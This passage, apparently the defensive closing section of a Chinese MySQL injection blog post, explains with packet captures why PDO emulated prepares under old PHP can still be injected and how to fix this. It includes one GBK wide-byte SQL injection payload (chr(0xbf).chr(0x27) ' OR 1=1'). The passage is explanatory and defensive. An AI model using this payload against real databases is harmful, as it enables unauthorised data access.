<p>环境如下：<br>PHP 5.4.7<br>Mysql 协议版本 10<br>MySQL Server 5.5.27<br>为了彻底搞清楚php与mysql server通讯的细节，我特别使用了wireshark抓包进行研究之,安装wireshak之后，我们设置过滤条件为tcp.port==3306, 如下图：<br><img src="http://dl2.iteye.com/upload/attachment/0082/1266/cfa06567-b3c0-3976-a33f-83273f7a6622.jpg" alt=""><br>如此只显示与mysql 3306端口的通信数据，避免不必要的干扰。<br>特别要注意的是wireshak基于wincap驱动，不支持本地环回接口的侦听（即使用php连接本地mysql的方法是无法侦听的），请连接其它机器（桥接网络的虚拟机也可）的MySQL进行测试。<br>然后运行我们的PHP程序，侦听结果如下，我们发现，PHP只是简单地将SQL直接发送给MySQL Server :<br><img src="http://dl2.iteye.com/upload/attachment/0082/1268/78ca895f-3dcf-39f3-a452-cb347a4807d1.jpg" alt=""><br>其实，这与我们平时使用mysql_real_escape_string将字符串进行转义，再拼接成SQL语句没有差别（只是由PDO本地驱动完成转义的），显然这种情况下还是有可能造成SQL注入的，也就是说在php本地调用pdo prepare中的mysql_real_escape_string来操作query，使用的是本地单字节字符集，而我们传递多字节编码的变量时，有可能还是会造成SQL注入漏洞(php 5.3.6以前版本的问题之一，这也就解释了为何在使用PDO时，建议升级到php 5.3.6+，并在DSN字符串中指定charset的原因。<br>针对php 5.3.6以前版本，以下代码仍然可能造成SQL注入问题：</p>
</blockquote>
<pre><code>$pdo-&gt;query(&apos;SET NAMES GBK&apos;); 
$var = chr(0xbf) . chr(0x27) . &quot; OR 1=1 /*&quot;; 
$query = &quot;SELECT * FROM info WHERE name = ?&quot;; 
$stmt = $pdo-&gt;prepare($query); 
$stmt-&gt;execute(array($var)); 
</code></pre><blockquote>
<p>原因与上面的分析是一致的。<br>而正确的转义应该是给mysql Server指定字符集，并将变量发送给MySQL Server完成根据字符转义。<br>那么，如何才能禁止PHP本地转义而交由MySQL Server转义呢？<br>PDO有一项参数，名为PDO::ATTR_EMULATE_PREPARES ，表示是否使用PHP本地模拟prepare，此项参数默认值未知。而且根据我们刚刚抓包分析结果来看，php 5.3.6+默认还是使用本地变量转，拼接成SQL发送给MySQL Server的，我们将这项值设置为false, 试试效果，如以下代码：  </p>
</blockquote>
<pre><code>&lt;?php
$pdo = new PDO(&quot;mysql:host=192.168.0.1;dbname=test;&quot;,&quot;root&quot;);
$pdo-&gt;setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$st = $pdo-&gt;prepare(&quot;select * from info where id =? and name = ?&quot;);
$id = 21;
$name = &apos;zhangsan&apos;;
$st-&gt;bindParam(1,$id);
$st-&gt;bindParam(2,$name);
$st-&gt;execute();
$st-&gt;fetchAll();
?&gt;
</code></pre><blockquote>
<p>红色行是我们刚加入的内容，运行以下程序，使用wireshark抓包分析，得出的结果如下：<br><img src="http://dl2.iteye.com/upload/attachment/0082/1270/4b73404b-3cc7-37c7-8679-5200e7dc872e.jpg" alt=""><br><img src="http://dl2.iteye.com/upload/attachment/0082/1272/1853a6e4-6e77-3297-921f-19132a5df698.jpg" alt=""><br>看到了吗？这就是神奇之处，可见这次PHP是将SQL模板和变量是分两次发送给MySQL的，由MySQL完成变量的转义处理，既然变量和SQL模板是分两次发送的，那么就不存在SQL注入的问题了，但需要在DSN中指定charset属性，如：  </p>
</blockquote>
<pre><code>$pdo = new PDO(&apos;mysql:host=localhost;dbname=test;charset=utf8&apos;, &apos;root&apos;);
</code></pre><!--
# 0x12 代码审计sql注入思路

 -->    
<p>参考文献：<a href="http://zhangxugg-163-com.iteye.com/blog/1835721" target="_blank" rel="noopener">http://zhangxugg-163-com.iteye.com/blog/1835721</a>  </p>

      
    </div>

    

    
    
    

	
    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Passer6y</li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://passer6y.fun/2017/12/23/Sql injection Conclusion/" title="MySql Injection Conclusion">http://passer6y.fun/2017/12/23/Sql injection Conclusion/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>true</li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQL注入/" rel="tag"><i class="fa fa-tag"></i> SQL注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/02/19/PHP反序列化总结/" rel="prev" title="PHP反序列化总结">
                PHP反序列化总结 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/21.jpg"
                alt="Passer6y" />
            
              <p class="site-author-name" itemprop="name">Passer6y</p>
              <p class="site-description motion-element" itemprop="description">A salty fish</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives">
                
                    <span class="site-state-item-count">16</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">5</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/passer6y" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:passer6y@d0g3.cn" target="_blank" title="E-Mail"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  
                </span>
              
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.wefun.win/" title="WeFun" target="_blank">WeFun</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#"><span class="nav-number">1.</span> <span class="nav-text"></span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-基于有正确回显的注入"><span class="nav-number"></span> <span class="nav-text">0x02 基于有正确回显的注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-基于构造错误sql语句的报错注入"><span class="nav-number"></span> <span class="nav-text">0x03 基于构造错误sql语句的报错注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04基于文件读写权限的注入"><span class="nav-number"></span> <span class="nav-text">0x04基于文件读写权限的注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x05盲注"><span class="nav-number"></span> <span class="nav-text">0x05盲注</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x06多种位置的注入："><span class="nav-number"></span> <span class="nav-text">0x06多种位置的注入：</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x07带外通道："><span class="nav-number"></span> <span class="nav-text">0x07带外通道：</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x08各种绕过姿势："><span class="nav-number"></span> <span class="nav-text">0x08各种绕过姿势：</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x09利用工具"><span class="nav-number"></span> <span class="nav-text">0x09利用工具</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x10如何用python写工具？"><span class="nav-number"></span> <span class="nav-text">0x10如何用python写工具？</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x11如何防御？"><span class="nav-number"></span> <span class="nav-text">0x11如何防御？</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#使用黑名单验证"><span class="nav-number">0.1.</span> <span class="nav-text">使用黑名单验证</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#正确使用过滤方式"><span class="nav-number">0.2.</span> <span class="nav-text">正确使用过滤方式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#使用预处理语句：PDO"><span class="nav-number">0.3.</span> <span class="nav-text">使用预处理语句：PDO</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#具体实现方法"><span class="nav-number">0.3.1.</span> <span class="nav-text">具体实现方法</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Passer6y</span>

  

  
</div>




<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>

 



  <span class="post-meta-divider">|</span>



<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共40.9k字</span>
</div>
        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



	





  





  








  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  
  
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(function (item) {
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: true,
        notify: false,
        appId: '3Jm4JutlBzR7fb3fxICb50pS-gzGzoHsz',
        appKey: 'TDRlM3HCI03SteHoOtVxJIMS',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>




  
  
  
  <link rel="stylesheet" href="/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/js/src/algolia-search.js?v=6.3.0"></script>



  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("3Jm4JutlBzR7fb3fxICb50pS-gzGzoHsz", "TDRlM3HCI03SteHoOtVxJIMS");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            
            counter.save(null, {
              success: function(counter) {
                
                  var $element = $(document.getElementById(url));
                  $element.find('.leancloud-visitors-count').text(counter.get('time'));
                
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            
              var $element = $(document.getElementById(url));
              $element.find('.leancloud-visitors-count').text('Counter not initialized! See more at console err msg.');
              console.error('ATTENTION! LeanCloud counter has security bug, see here how to solve it: https://github.com/theme-next/hexo-leancloud-counter-security. \n But you also can use LeanCloud without security, by set \'security\' option to \'false\'.');
            
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

  
  

  

  

  

  

  
  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('Copy').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
          if(result)$(this).text('Copied')
          else $(this).text('Copy failed')
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('Copy')
        }, 300)
      }).append(e)
    })
  </script>


</body>
</html>
